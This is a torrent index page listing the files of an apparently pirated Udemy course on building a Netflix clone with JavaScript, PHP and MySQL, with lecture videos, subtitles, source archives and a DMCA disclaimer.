GetFreeCourses.Co-Udemy-Create a Netflix clone from Scratch- JavaScript PHP + MySQL

mp4   Hot:142   Size:21.68 GB   Created:2022-11-04 11:34:56   Update:2024-11-18 12:08:48  

File List

  • 01 Introduction/001 Intro video.en.srt 2.53 KB
    01 Introduction/001 Intro video.mp4 26.34 MB
    01 Introduction/002 Xampp installation.en.srt 9.5 KB
    01 Introduction/002 Xampp installation.mp4 64.82 MB
    01 Introduction/003 Downloading a text editor.en.srt 1.24 KB
    01 Introduction/003 Downloading a text editor.mp4 6.84 MB
    01 Introduction/004 Creating our index page.en.srt 6.87 KB
    01 Introduction/004 Creating our index page.mp4 43.85 MB
    01 Introduction/004 reeceflix-indexPage.zip 1.25 KB
    02 RegisterLogin Page - Front end/005 Creating the users table.en.srt 11.37 KB
    02 RegisterLogin Page - Front end/005 Creating the users table.mp4 87.35 MB
    02 RegisterLogin Page - Front end/006 Creating the register page.en.srt 10.36 KB
    02 RegisterLogin Page - Front end/006 Creating the register page.mp4 57.65 MB
    02 RegisterLogin Page - Front end/006 reeceflix-registerPage.zip 3.89 KB
    02 RegisterLogin Page - Front end/007 Styling our form column.en.srt 12.08 KB
    02 RegisterLogin Page - Front end/007 Styling our form column.mp4 64.73 MB
    02 RegisterLogin Page - Front end/007 reeceflix-columnStyle.zip 4.08 KB
    02 RegisterLogin Page - Front end/008 Creating the input fields.en.srt 9.87 KB
    02 RegisterLogin Page - Front end/008 Creating the input fields.mp4 55.45 MB
    02 RegisterLogin Page - Front end/008 reeceflix-inputForm.zip 4.18 KB
    02 RegisterLogin Page - Front end/009 Quick preview of handling the form submission.en.srt 5.87 KB
    02 RegisterLogin Page - Front end/009 Quick preview of handling the form submission.mp4 36.57 MB
    02 RegisterLogin Page - Front end/009 reeceflix-testFormSubmit.zip 4.39 KB
    02 RegisterLogin Page - Front end/010 Styling the input fields.en.srt 9.91 KB
    02 RegisterLogin Page - Front end/010 Styling the input fields.mp4 74.54 MB
    02 RegisterLogin Page - Front end/010 reeceflix-inputStyle.zip 4.44 KB
    02 RegisterLogin Page - Front end/011 Creating the title section.en.srt 15.48 KB
    02 RegisterLogin Page - Front end/011 Creating the title section.mp4 105.87 MB
    02 RegisterLogin Page - Front end/011 reeceflix-headerStyle.zip 4.6 KB
    02 RegisterLogin Page - Front end/012 Adding a site logo.en.srt 9.77 KB
    02 RegisterLogin Page - Front end/012 Adding a site logo.mp4 70.85 MB
    02 RegisterLogin Page - Front end/012 reeceflix-siteLogo.zip 25.51 KB
    02 RegisterLogin Page - Front end/013 Styling the login link.en.srt 8.09 KB
    02 RegisterLogin Page - Front end/013 Styling the login link.mp4 68.02 MB
    02 RegisterLogin Page - Front end/013 reeceflix-loginLink.zip 88.98 KB
    02 RegisterLogin Page - Front end/014 Creating the login page.en.srt 3.14 KB
    02 RegisterLogin Page - Front end/014 Creating the login page.mp4 22.9 MB
    02 RegisterLogin Page - Front end/014 reeceflix-loginPage.zip 91.67 KB
    03 RegisterLogin Page - Back end/015 Sanitising the users first name.en.srt 15.49 KB
    03 RegisterLogin Page - Back end/015 Sanitising the users first name.mp4 92.1 MB
    03 RegisterLogin Page - Back end/015 reeceflix-sanitizeString.zip 93.72 KB
    03 RegisterLogin Page - Back end/016 Form sanitizer class.en.srt 9.1 KB
    03 RegisterLogin Page - Back end/016 Form sanitizer class.mp4 50.24 MB
    03 RegisterLogin Page - Back end/016 reeceflix-FormSanitizerClass.zip 96.19 KB
    03 RegisterLogin Page - Back end/017 Sanitation methods.en.srt 7.97 KB
    03 RegisterLogin Page - Back end/017 Sanitation methods.mp4 54.03 MB
    03 RegisterLogin Page - Back end/017 reeceflix-sanitationMethods.zip 101.03 KB
    03 RegisterLogin Page - Back end/018 Config file.en.srt 8.43 KB
    03 RegisterLogin Page - Back end/018 Config file.mp4 41.62 MB
    03 RegisterLogin Page - Back end/018 reeceflix-configFile.zip 104.68 KB
    03 RegisterLogin Page - Back end/019 Connecting to the database.en.srt 12.78 KB
    03 RegisterLogin Page - Back end/019 Connecting to the database.mp4 63.46 MB
    03 RegisterLogin Page - Back end/019 reeceflix-connectDatabase.zip 108.07 KB
    03 RegisterLogin Page - Back end/020 Creating the Account class.en.srt 7.39 KB
    03 RegisterLogin Page - Back end/020 Creating the Account class.mp4 37.77 MB
    03 RegisterLogin Page - Back end/020 reeceflix-AccountClass.zip 112.27 KB
    03 RegisterLogin Page - Back end/021 Validating the first name.en.srt 6.96 KB
    03 RegisterLogin Page - Back end/021 Validating the first name.mp4 38.05 MB
    03 RegisterLogin Page - Back end/021 reeceflix-validateFirstName.zip 115.5 KB
    03 RegisterLogin Page - Back end/022 Displaying errors to the user.en.srt 8.18 KB
    03 RegisterLogin Page - Back end/022 Displaying errors to the user.mp4 54.98 MB
    03 RegisterLogin Page - Back end/022 reeceflix-getError.zip 119.17 KB
    03 RegisterLogin Page - Back end/023 Using constants for our error messages.en.srt 5.44 KB
    03 RegisterLogin Page - Back end/023 Using constants for our error messages.mp4 32.7 MB
    03 RegisterLogin Page - Back end/023 reeceflix-constants.zip 123.67 KB
    03 RegisterLogin Page - Back end/024 Validating the last name.en.srt 8.72 KB
    03 RegisterLogin Page - Back end/024 Validating the last name.mp4 56.88 MB
    03 RegisterLogin Page - Back end/024 reeceflix-validateLastName.zip 128.05 KB
    03 RegisterLogin Page - Back end/025 Validating the username.en.srt 10.8 KB
    03 RegisterLogin Page - Back end/025 Validating the username.mp4 67.87 MB
    03 RegisterLogin Page - Back end/025 reeceflix-validateUsername.zip 132.72 KB
    03 RegisterLogin Page - Back end/026 Validating the email.en.srt 13.22 KB
    03 RegisterLogin Page - Back end/026 Validating the email.mp4 85.35 MB
    03 RegisterLogin Page - Back end/026 reeceflix-validateEmail.zip 143.06 KB
    03 RegisterLogin Page - Back end/027 Validating the passwords.en.srt 6.85 KB
    03 RegisterLogin Page - Back end/027 Validating the passwords.mp4 48.4 MB
    03 RegisterLogin Page - Back end/027 reeceflix-validatePasswords.zip 143.13 KB
    03 RegisterLogin Page - Back end/028 Stying the error messages.en.srt 3.33 KB
    03 RegisterLogin Page - Back end/028 Stying the error messages.mp4 23.23 MB
    03 RegisterLogin Page - Back end/028 reeceflix-errorMessageStyle.zip 148.07 KB
    03 RegisterLogin Page - Back end/029 Inserting the users details to the table.en.srt 11.86 KB
    03 RegisterLogin Page - Back end/029 Inserting the users details to the table.mp4 82.81 MB
    03 RegisterLogin Page - Back end/029 reeceflix-insertUserDetails.zip 151.33 KB
    03 RegisterLogin Page - Back end/030 Lets try the insert query out.en.srt 7.76 KB
    03 RegisterLogin Page - Back end/030 Lets try the insert query out.mp4 57.81 MB
    03 RegisterLogin Page - Back end/030 reeceflix-testInsertQuery.zip 155.95 KB
    03 RegisterLogin Page - Back end/031 How to debug MySQL queries.en.srt 5.44 KB
    03 RegisterLogin Page - Back end/031 How to debug MySQL queries.mp4 40.4 MB
    03 RegisterLogin Page - Back end/031 reeceflix-debugQueries.zip 156.98 KB
    03 RegisterLogin Page - Back end/032 Writing the login function.en.srt 11.46 KB
    03 RegisterLogin Page - Back end/032 Writing the login function.mp4 73.68 MB
    03 RegisterLogin Page - Back end/032 reeceflix-loginFunction.zip 160.75 KB
    03 RegisterLogin Page - Back end/033 Lets try the login function out.en.srt 6.47 KB
    03 RegisterLogin Page - Back end/033 Lets try the login function out.mp4 40.55 MB
    03 RegisterLogin Page - Back end/033 reeceflix-testLogin.zip 162.86 KB
    03 RegisterLogin Page - Back end/034 Storing the session.en.srt 9.09 KB
    03 RegisterLogin Page - Back end/034 Storing the session.mp4 52.43 MB
    03 RegisterLogin Page - Back end/034 reeceflix-sessions.zip 166.62 KB
    03 RegisterLogin Page - Back end/035 Remembering the last entered values.en.srt 6.68 KB
    03 RegisterLogin Page - Back end/035 Remembering the last entered values.mp4 36.75 MB
    03 RegisterLogin Page - Back end/035 reeceflix-getInputValue.zip 168.86 KB
    03 RegisterLogin Page - Back end/036 Remembering the values entered on the register page.en.srt 5.18 KB
    03 RegisterLogin Page - Back end/036 Remembering the values entered on the register page.mp4 32.54 MB
    03 RegisterLogin Page - Back end/036 reeceflix-registerValues.zip 171.05 KB
    04 Creating the video preview/037 Setting our our tables.en.srt 9.35 KB
    04 Creating the video preview/037 Setting our our tables.mp4 77.47 MB
    04 Creating the video preview/037 categories.sql 1.72 KB
    04 Creating the video preview/037 entities.sql 5.75 KB
    04 Creating the video preview/037 videos.sql 393.56 KB
    04 Creating the video preview/038 Adding sample video files and images.en.srt 7.34 KB
    04 Creating the video preview/038 Adding sample video files and images.mp4 65.78 MB
    04 Creating the video preview/038 sample-data.zip 150.33 MB
    04 Creating the video preview/039 Explanation of the tables.en.srt 7.44 KB
    04 Creating the video preview/039 Explanation of the tables.mp4 70.15 MB
    04 Creating the video preview/040 Creating the preview provider class.en.srt 8.35 KB
    04 Creating the video preview/040 Creating the preview provider class.mp4 42.47 MB
    04 Creating the video preview/040 reeceflix-PreviewProvider.zip 233.2 MB
    04 Creating the video preview/041 Getting a random entity from the table.en.srt 9 KB
    04 Creating the video preview/041 Getting a random entity from the table.mp4 59.55 MB
    04 Creating the video preview/041 reeceflix-getRandomEntity.zip 233.21 MB
    04 Creating the video preview/042 Creating the entity class.en.srt 8.71 KB
    04 Creating the video preview/042 Creating the entity class.mp4 41.85 MB
    04 Creating the video preview/043 Entity getter functions.en.srt 7.98 KB
    04 Creating the video preview/043 Entity getter functions.mp4 48.72 MB
    04 Creating the video preview/043 reeceflix-entityFunctions.zip 233.21 MB
    04 Creating the video preview/044 Showing the preview video.en.srt 5.39 KB
    04 Creating the video preview/044 Showing the preview video.mp4 39.21 MB
    04 Creating the video preview/044 reeceflix-previewVideo.zip 233.21 MB
    04 Creating the video preview/045 Splitting code into a header file.en.srt 6.38 KB
    04 Creating the video preview/045 Splitting code into a header file.mp4 38.95 MB
    04 Creating the video preview/045 reeceflix-header.zip 233.22 MB
    04 Creating the video preview/046 Creating the preview overlay.en.srt 8.62 KB
    04 Creating the video preview/046 Creating the preview overlay.mp4 89.08 MB
    04 Creating the video preview/046 reeceflix-previewOverlay.zip 233.22 MB
    04 Creating the video preview/047 Preview details element.en.srt 6.66 KB
    04 Creating the video preview/047 Preview details element.mp4 67.53 MB
    04 Creating the video preview/047 reeceflix-mainDetails.zip 233.22 MB
    04 Creating the video preview/048 Styling the buttons.en.srt 10.45 KB
    04 Creating the video preview/048 Styling the buttons.mp4 97.09 MB
    04 Creating the video preview/048 reeceflix-buttonStyle.zip 233.23 MB
    04 Creating the video preview/049 Font Awesome icons.en.srt 9.78 KB
    04 Creating the video preview/049 Font Awesome icons.mp4 87.02 MB
    04 Creating the video preview/049 reeceflix-fontAwesome.zip 233.23 MB
    04 Creating the video preview/050 Button hover state.en.srt 2.74 KB
    04 Creating the video preview/050 Button hover state.mp4 21.1 MB
    04 Creating the video preview/050 reeceflix-buttonHover.zip 233.24 MB
    04 Creating the video preview/051 Muting and unmuting the preview video.en.srt 8.54 KB
    04 Creating the video preview/051 Muting and unmuting the preview video.mp4 64.49 MB
    04 Creating the video preview/051 reeceflix-muteToggle.zip 233.24 MB
    04 Creating the video preview/052 Changing the icon on muteunmute.en.srt 5.1 KB
    04 Creating the video preview/052 Changing the icon on muteunmute.mp4 38.15 MB
    04 Creating the video preview/052 reeceflix-toggleIcon.zip 233.24 MB
    04 Creating the video preview/053 Showing the image when the preview has ended.en.srt 4.2 KB
    04 Creating the video preview/053 Showing the image when the preview has ended.mp4 29.31 MB
    04 Creating the video preview/053 reeceflix-previewEnded.zip 233.25 MB
    05 Displaying movies and tv shows/054 Adding some style to the page background.en.srt 3.96 KB
    05 Displaying movies and tv shows/054 Adding some style to the page background.mp4 37.28 MB
    05 Displaying movies and tv shows/054 reeceflix-wrapperStyle.zip 233.25 MB
    05 Displaying movies and tv shows/055 Creating the category container class.en.srt 7.17 KB
    05 Displaying movies and tv shows/055 Creating the category container class.mp4 53.99 MB
    05 Displaying movies and tv shows/055 reeceflix-categoryContainers.zip 233.25 MB
    05 Displaying movies and tv shows/056 Showing all categories.en.srt 8.16 KB
    05 Displaying movies and tv shows/056 Showing all categories.mp4 60.4 MB
    05 Displaying movies and tv shows/056 reeceflix-showllCategories.zip 233.26 MB
    05 Displaying movies and tv shows/057 Creating the Entity provider class.en.srt 14.82 KB
    05 Displaying movies and tv shows/057 Creating the Entity provider class.mp4 86.85 MB
    05 Displaying movies and tv shows/058 Looping over each entity.en.srt 7.63 KB
    05 Displaying movies and tv shows/058 Looping over each entity.mp4 52.01 MB
    05 Displaying movies and tv shows/058 reeceflix-loopEntities.zip 233.26 MB
    05 Displaying movies and tv shows/059 Outputting the html for each entity.en.srt 7.22 KB
    05 Displaying movies and tv shows/059 Outputting the html for each entity.mp4 49.58 MB
    05 Displaying movies and tv shows/059 entityPreview.mp4 325.32 MB
    05 Displaying movies and tv shows/060 Styling the entity previews.en.srt 7.01 KB
    05 Displaying movies and tv shows/060 Styling the entity previews.mp4 59.04 MB
    05 Displaying movies and tv shows/060 reeceflix-previewContainerSmall.zip 233.27 MB
    05 Displaying movies and tv shows/061 Styling the category sections.en.srt 10.71 KB
    05 Displaying movies and tv shows/061 Styling the category sections.mp4 85.28 MB
    05 Displaying movies and tv shows/061 reeceflix-categoryStyle.zip 233.27 MB
    05 Displaying movies and tv shows/Download Paid Udemy Courses For Free.url 116 B
    05 Displaying movies and tv shows/GetFreeCourses.Co.url 116 B
    05 Displaying movies and tv shows/How you can help GetFreeCourses.Co.txt 182 B
    06 Creating the entity page/062 Creating the entity page.en.srt 10.7 KB
    06 Creating the entity page/062 Creating the entity page.mp4 81.3 MB
    06 Creating the entity page/062 reeceflix-entityPage.zip 233.28 MB
    06 Creating the entity page/063 Error message class.en.srt 7.71 KB
    06 Creating the entity page/063 Error message class.mp4 44.93 MB
    06 Creating the entity page/063 reeceflix-errorMessage.zip 233.28 MB
    06 Creating the entity page/064 Creating the season provider.en.srt 6.31 KB
    06 Creating the entity page/064 Creating the season provider.mp4 38.02 MB
    06 Creating the entity page/064 reeceflix-SeasonProvider.zip 233.29 MB
    06 Creating the entity page/065 Getting the seasons.en.srt 7 KB
    06 Creating the entity page/065 Getting the seasons.mp4 51.7 MB
    06 Creating the entity page/065 reeceflix-getSeasons.zip 233.29 MB
    06 Creating the entity page/066 Creating the video class.en.srt 11.18 KB
    06 Creating the entity page/066 Creating the video class.mp4 81.04 MB
    06 Creating the entity page/066 reeceflix-videoClass.zip 233.29 MB
    06 Creating the entity page/067 Creating the season class.en.srt 12.46 KB
    06 Creating the entity page/067 Creating the season class.mp4 81.11 MB
    06 Creating the entity page/067 reeceflix-seasonsClass.zip 233.3 MB
    06 Creating the entity page/068 Outputting the season numbers.en.srt 6.51 KB
    06 Creating the entity page/068 Outputting the season numbers.mp4 40.43 MB
    06 Creating the entity page/068 reeceflix-outputSeasonNum.zip 233.3 MB
    06 Creating the entity page/069 Getting the video properties.en.srt 5.92 KB
    06 Creating the entity page/069 Getting the video properties.mp4 39.76 MB
    06 Creating the entity page/069 reeceflix-videoProperties.zip 233.3 MB
    06 Creating the entity page/070 Outputting the episodes.en.srt 6.84 KB
    06 Creating the entity page/070 Outputting the episodes.mp4 49.95 MB
    06 Creating the entity page/070 reeceflix-outputVideo.zip 233.31 MB
    06 Creating the entity page/071 Styling the episodes.en.srt 11.97 KB
    06 Creating the entity page/071 Styling the episodes.mp4 109.86 MB
    06 Creating the entity page/071 reeceflix-stylingVideos.zip 233.31 MB
    06 Creating the entity page/072 Showing you might also like section.en.srt 12.63 KB
    06 Creating the entity page/072 Showing you might also like section.mp4 108.8 MB
    06 Creating the entity page/072 reeceflix-youMightLike.zip 233.32 MB
    07 Creating the watch video page/073 Incrementing the video views.en.srt 6.7 KB
    07 Creating the watch video page/073 Incrementing the video views.mp4 51.64 MB
    07 Creating the watch video page/073 reeceflix-incrementViews.zip 233.32 MB
    07 Creating the watch video page/074 Displaying the video.en.srt 6.32 KB
    07 Creating the watch video page/074 Displaying the video.mp4 45.96 MB
    07 Creating the watch video page/074 reeceflix-videoTag.zip 233.32 MB
    07 Creating the watch video page/075 Creating the back button.en.srt 10.44 KB
    07 Creating the watch video page/075 Creating the back button.mp4 81.08 MB
    07 Creating the watch video page/075 reeceflix-videoBackButton.zip 233.33 MB
    07 Creating the watch video page/076 Back button functionality.en.srt 1.71 KB
    07 Creating the watch video page/076 Back button functionality.mp4 13.9 MB
    07 Creating the watch video page/076 reeceflix-goBack.zip 233.33 MB
    07 Creating the watch video page/077 Hiding the video controls after 2 seconds.en.srt 7.89 KB
    07 Creating the watch video page/077 Hiding the video controls after 2 seconds.mp4 48.5 MB
    07 Creating the watch video page/077 reeceflix-startHideTimer.zip 233.33 MB
    07 Creating the watch video page/078 Video progress table.en.srt 3.66 KB
    07 Creating the watch video page/078 Video progress table.mp4 28.07 MB
    07 Creating the watch video page/079 Initialising the video.en.srt 5.48 KB
    07 Creating the watch video page/079 Initialising the video.mp4 35.49 MB
    07 Creating the watch video page/080 Making an ajax call.en.srt 9.22 KB
    07 Creating the watch video page/080 Making an ajax call.mp4 40.19 MB
    07 Creating the watch video page/081 Passing data in our ajax call.en.srt 8.67 KB
    07 Creating the watch video page/081 Passing data in our ajax call.mp4 40.86 MB
    07 Creating the watch video page/082 Inserting the initial video progress into the table.en.srt 9.97 KB
    07 Creating the watch video page/082 Inserting the initial video progress into the table.mp4 56.63 MB
    07 Creating the watch video page/082 reeceflix-insertDuration.zip 233.34 MB
    07 Creating the watch video page/083 Creating the video progress timer.en.srt 6.6 KB
    07 Creating the watch video page/083 Creating the video progress timer.mp4 52.67 MB
    07 Creating the watch video page/083 reeceflix-durationTimer.zip 233.34 MB
    07 Creating the watch video page/084 Updating the video progress as the video plays.en.srt 10.01 KB
    07 Creating the watch video page/084 Updating the video progress as the video plays.mp4 66.08 MB
    07 Creating the watch video page/085 Marking the video as seen.en.srt 7.39 KB
    07 Creating the watch video page/085 Marking the video as seen.mp4 43.24 MB
    07 Creating the watch video page/085 reeceflix-setFinished.zip 233.35 MB
    07 Creating the watch video page/086 Resume playing where we left off.en.srt 15.62 KB
    07 Creating the watch video page/086 Resume playing where we left off.mp4 98.02 MB
    07 Creating the watch video page/086 reeceflix-getProgress.zip 233.35 MB
    08 The up next overlay/087 Getting the up next video.en.srt 11.4 KB
    08 The up next overlay/087 Getting the up next video.mp4 52.18 MB
    08 The up next overlay/087 reeceflix-VideoProvider.zip 233.35 MB
    08 The up next overlay/088 Up next video when theres no more episodes.en.srt 5.7 KB
    08 The up next overlay/088 Up next video when theres no more episodes.mp4 33.73 MB
    08 The up next overlay/088 reeceflix-VideoProviderFallbackVideo.zip 233.35 MB
    08 The up next overlay/089 Up next title.en.srt 10.75 KB
    08 The up next overlay/089 Up next title.mp4 69.94 MB
    08 The up next overlay/089 reeceflix-upNextTitle.zip 233.36 MB
    08 The up next overlay/090 Displaying the season and episode number.en.srt 4.77 KB
    08 The up next overlay/090 Displaying the season and episode number.mp4 33.15 MB
    08 The up next overlay/090 reeceflix-seasonAndEpisode.zip 233.36 MB
    08 The up next overlay/091 The play next video button.en.srt 2.46 KB
    08 The up next overlay/091 The play next video button.mp4 17.31 MB
    08 The up next overlay/091 reeceflix-playNextButton.zip 233.36 MB
    08 The up next overlay/092 Styling the up next controls.en.srt 5.85 KB
    08 The up next overlay/092 Styling the up next controls.mp4 45.66 MB
    08 The up next overlay/092 reeceflix-upNextStyle.zip 233.37 MB
    08 The up next overlay/093 Restart video button.en.srt 4.55 KB
    08 The up next overlay/093 Restart video button.mp4 30.64 MB
    08 The up next overlay/093 reeceflix-restartVideo.zip 233.37 MB
    08 The up next overlay/094 Play button functionality.en.srt 2.85 KB
    08 The up next overlay/094 Play button functionality.mp4 23.19 MB
    08 The up next overlay/094 watchVideoLink.mp4 143.26 MB
    08 The up next overlay/095 Showing the overlay when the video ends.en.srt 3.12 KB
    08 The up next overlay/095 Showing the overlay when the video ends.mp4 26.6 MB
    08 The up next overlay/095 showUpNextOverlay.mp4 210.03 MB
    08 The up next overlay/096 Getting the entity id for a video.en.srt 11.38 KB
    08 The up next overlay/096 Getting the entity id for a video.mp4 108.48 MB
    08 The up next overlay/097 Getting the next video for that entity.en.srt 9.3 KB
    08 The up next overlay/097 Getting the next video for that entity.mp4 53.87 MB
    08 The up next overlay/097 entityVideoUser.mp4 282.4 MB
    08 The up next overlay/098 Hooking up the play button on the video preview.en.srt 5.56 KB
    08 The up next overlay/098 Hooking up the play button on the video preview.mp4 55.07 MB
    08 The up next overlay/099 Subtitle of the video preview.en.srt 6.3 KB
    08 The up next overlay/099 Subtitle of the video preview.mp4 47.31 MB
    08 The up next overlay/100 Play button text.en.srt 8.48 KB
    08 The up next overlay/100 Play button text.mp4 63.8 MB
    08 The up next overlay/101 Displaying a check mark on seen videos.en.srt 8.72 KB
    08 The up next overlay/101 Displaying a check mark on seen videos.mp4 76.11 MB
    09 Navigation bar/102 Navigation bar html.en.srt 8.2 KB
    09 Navigation bar/102 Navigation bar html.mp4 54.51 MB
    09 Navigation bar/103 Styling the navigation bar.en.srt 10.26 KB
    09 Navigation bar/103 Styling the navigation bar.mp4 112.39 MB
    09 Navigation bar/104 Changing the background color on scroll.en.srt 8.6 KB
    09 Navigation bar/104 Changing the background color on scroll.mp4 71.92 MB
    09 Navigation bar/105 Hiding the navigation on the watch page.en.srt 4.9 KB
    09 Navigation bar/105 Hiding the navigation on the watch page.mp4 33.9 MB
    10 TV Shows movies and category pages/106 TV shows page.en.srt 9.69 KB
    10 TV Shows movies and category pages/106 TV shows page.mp4 77.5 MB
    10 TV Shows movies and category pages/107 TV show preview video.en.srt 7.01 KB
    10 TV Shows movies and category pages/107 TV show preview video.mp4 48.02 MB
    10 TV Shows movies and category pages/108 TV show categories.en.srt 6.5 KB
    10 TV Shows movies and category pages/108 TV show categories.mp4 51.78 MB
    10 TV Shows movies and category pages/109 Movies page preview video.en.srt 5.49 KB
    10 TV Shows movies and category pages/109 Movies page preview video.mp4 36.8 MB
    10 TV Shows movies and category pages/110 Movies page categories.en.srt 3.07 KB
    10 TV Shows movies and category pages/110 Movies page categories.mp4 27.2 MB
    10 TV Shows movies and category pages/111 Category page preview video.en.srt 5.71 KB
    10 TV Shows movies and category pages/111 Category page preview video.mp4 36.49 MB
    10 TV Shows movies and category pages/112 Category page entities.en.srt 1.15 KB
    10 TV Shows movies and category pages/112 Category page entities.mp4 9.98 MB
    10 TV Shows movies and category pages/Download Paid Udemy Courses For Free.url 116 B
    10 TV Shows movies and category pages/GetFreeCourses.Co.url 116 B
    10 TV Shows movies and category pages/How you can help GetFreeCourses.Co.txt 182 B
    11 Search page/113 Creating the search page html.en.srt 7.58 KB
    11 Search page/113 Creating the search page html.mp4 51.13 MB
    11 Search page/114 Searching after 500 milliseconds.en.srt 7.14 KB
    11 Search page/114 Searching after 500 milliseconds.mp4 34.39 MB
    11 Search page/115 Implementing the search ajax.en.srt 6.87 KB
    11 Search page/115 Implementing the search ajax.mp4 36.78 MB
    11 Search page/116 Creating the search results provider.en.srt 4.96 KB
    11 Search page/116 Creating the search results provider.mp4 21.6 MB
    11 Search page/117 Writing the search query.en.srt 7.82 KB
    11 Search page/117 Writing the search query.mp4 40.54 MB
    11 Search page/118 Outputting the search results.en.srt 6.05 KB
    11 Search page/118 Outputting the search results.mp4 36.95 MB
    12 Account page/119 Profile page html.en.srt 8.93 KB
    12 Account page/119 Profile page html.mp4 47.49 MB
    12 Account page/120 Pre filling the text box values.en.srt 12.3 KB
    12 Account page/120 Pre filling the text box values.mp4 68.8 MB
    12 Account page/121 Styling the forms.en.srt 8.98 KB
    12 Account page/121 Styling the forms.mp4 76.42 MB
    12 Account page/122 Handling the user details form submission.en.srt 11.94 KB
    12 Account page/122 Handling the user details form submission.mp4 69.08 MB
    12 Account page/123 Checking if the data is valid.en.srt 7.41 KB
    12 Account page/123 Checking if the data is valid.mp4 41.72 MB
    12 Account page/124 Updating the users details.en.srt 5.19 KB
    12 Account page/124 Updating the users details.mp4 31.56 MB
    12 Account page/125 Showing a successerror message.en.srt 7.9 KB
    12 Account page/125 Showing a successerror message.mp4 52.91 MB
    12 Account page/126 Password form submission.en.srt 5.13 KB
    12 Account page/126 Password form submission.mp4 36.7 MB
    12 Account page/127 Updating the password.en.srt 10.97 KB
    12 Account page/127 Updating the password.mp4 67.34 MB
    12 Account page/128 Logging out.en.srt 4.36 KB
    12 Account page/128 Logging out.mp4 24.95 MB
    12 Account page/Download Paid Udemy Courses For Free.url 116 B
    12 Account page/GetFreeCourses.Co.url 116 B
    12 Account page/How you can help GetFreeCourses.Co.txt 182 B
    13 PayPal payment subscription integration/129 The subscribe html code.en.srt 6.67 KB
    13 PayPal payment subscription integration/129 The subscribe html code.mp4 45.4 MB
    13 PayPal payment subscription integration/129 reeceflix-subscriptionHtml.zip 233.52 MB
    13 PayPal payment subscription integration/130 Adding the PayPal SDK.en.srt 2.07 KB
    13 PayPal payment subscription integration/130 Adding the PayPal SDK.mp4 15.32 MB
    13 PayPal payment subscription integration/130 reeceflix-payPalSdk.zip 234.01 MB
    13 PayPal payment subscription integration/131 PayPal configuration credentials.en.srt 8.21 KB
    13 PayPal payment subscription integration/131 PayPal configuration credentials.mp4 53.51 MB
    13 PayPal payment subscription integration/131 reeceflix-paypalConfig.zip 234.01 MB
    13 PayPal payment subscription integration/132 Creating a billing plan.en.srt 12.28 KB
    13 PayPal payment subscription integration/132 Creating a billing plan.mp4 86.46 MB
    13 PayPal payment subscription integration/132 reeceflix-billingPlan.zip 234.02 MB
    13 PayPal payment subscription integration/133 Creating a billing agreement.en.srt 9.02 KB
    13 PayPal payment subscription integration/133 Creating a billing agreement.mp4 59.96 MB
    13 PayPal payment subscription integration/133 reeceflix-billingAgreement.zip 234.03 MB
    13 PayPal payment subscription integration/134 Testing out the payment system.en.srt 6.75 KB
    13 PayPal payment subscription integration/134 Testing out the payment system.mp4 55.18 MB
    13 PayPal payment subscription integration/134 reeceflix-testPayments.zip 234.03 MB
    13 PayPal payment subscription integration/135 Executing the billing agreement.en.srt 7.61 KB
    13 PayPal payment subscription integration/135 Executing the billing agreement.mp4 55.63 MB
    13 PayPal payment subscription integration/135 reeceflix-executeAgreement.zip 234.03 MB
    13 PayPal payment subscription integration/136 Charging a setup fee.en.srt 8.83 KB
    13 PayPal payment subscription integration/136 Charging a setup fee.mp4 72.67 MB
    13 PayPal payment subscription integration/136 reeceflix-setupFee.zip 234.04 MB
    13 PayPal payment subscription integration/137 Showing an error message.en.srt 2.74 KB
    13 PayPal payment subscription integration/137 Showing an error message.mp4 22.33 MB
    13 PayPal payment subscription integration/137 reeceflix-cancelMessage.zip 234.04 MB
    13 PayPal payment subscription integration/138 Storing the transaction details.en.srt 9.27 KB
    13 PayPal payment subscription integration/138 Storing the transaction details.mp4 62.76 MB
    13 PayPal payment subscription integration/138 reeceflix-billingDetails.zip 234.04 MB
    13 PayPal payment subscription integration/139 Setting the users account to subscribed.en.srt 10.55 KB
    13 PayPal payment subscription integration/139 Setting the users account to subscribed.mp4 78.71 MB
    13 PayPal payment subscription integration/139 reeceflix-updateAccount.zip 234.05 MB
    13 PayPal payment subscription integration/140 What about cancellations.en.srt 3.26 KB
    13 PayPal payment subscription integration/140 What about cancellations.mp4 23.29 MB
    13 PayPal payment subscription integration/141 Preventing users watching videos if not subscribed.en.srt 3.64 KB
    13 PayPal payment subscription integration/141 Preventing users watching videos if not subscribed.mp4 32.44 MB
    13 PayPal payment subscription integration/141 reeceflix-complete-source-code.zip 234.25 MB
    Download Paid Udemy Courses For Free.url 116 B
    GetFreeCourses.Co.url 116 B
    How you can help GetFreeCourses.Co.txt 182 B

Download Info

  • Tips

    “GetFreeCourses.Co-Udemy-Create a Netflix clone from Scratch- JavaScript PHP + MySQL” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

